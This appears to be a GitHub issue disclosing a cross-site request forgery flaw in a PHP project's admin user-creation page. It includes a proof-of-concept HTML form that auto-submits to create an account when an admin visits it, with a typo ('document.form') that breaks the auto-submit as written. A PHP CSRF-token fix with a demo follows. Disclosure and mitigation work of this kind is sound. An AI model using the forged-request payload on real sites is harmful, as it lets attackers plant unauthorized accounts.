Open ghost opened 7 years ago
/admin/newb.php

```php
$username = $_POST['username'];
$email = $_POST['email'];
$password = $_POST['password'];
```
Obviously it does not implement a CSRF token, which makes it possible that a new user could be created once the admin visits the following web page:

```html
<form action="http://allendiskdemo.com/admin/newb.php" method="POST">
<input type=text name=username value=newuser>
<input type=text name=password value=passw0rd>
<input type=text name=email value=newuser@new.com>
</form>
<script>document.form[0].submit()</script>
```
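One way to close the gap reported above, as an added example that is not part of the original report or the project's own code: a per-session token issued with the admin form and checked before the handler reads `$_POST['username']`. The function names `csrf_issue_token` and `csrf_verify`, the `csrf_token` field name, and the sample requests are assumptions made for illustration.

```php
<?php
// Added example. csrf_issue_token(), csrf_verify() and the 'csrf_token'
// field are hypothetical names, not taken from the project.

// Issue one random token per session; the admin form embeds it as a hidden field.
function csrf_issue_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing request only if it is a POST carrying the session's token.
function csrf_verify(array $session, array $post, string $method): bool {
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Reject a missing session token and non-string input (e.g. csrf_token[]=x).
    if (!is_string($expected) || $expected === '' || !is_string($supplied)) {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// In /admin/newb.php this check would run before any $_POST field is used:
//   session_start();
//   if (!csrf_verify($_SESSION, $_POST, $_SERVER['REQUEST_METHOD'])) {
//       http_response_code(403);
//       exit;
//   }

// --- Constructed demo, runnable from the command line ---
$session = [];                          // stands in for $_SESSION
$token   = csrf_issue_token($session);  // value rendered into the form

// Constructed request from the site's own form: carries the hidden token.
$sameSite = ['username' => 'alice', 'email' => 'alice@example.com',
             'password' => 'constructed', 'csrf_token' => $token];
// Constructed cross-site request shaped like the one in the report: no token.
$crossSite = ['username' => 'newuser', 'email' => 'newuser@new.com',
              'password' => 'passw0rd'];

echo 'own form accepted:   ', var_export(csrf_verify($session, $sameSite, 'POST'), true), "\n";
echo 'cross-site accepted: ', var_export(csrf_verify($session, $crossSite, 'POST'), true), "\n";
echo 'array token accepted: ', var_export(csrf_verify($session, ['csrf_token' => ['x']], 'POST'), true), "\n";
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` complements the token check but does not replace it.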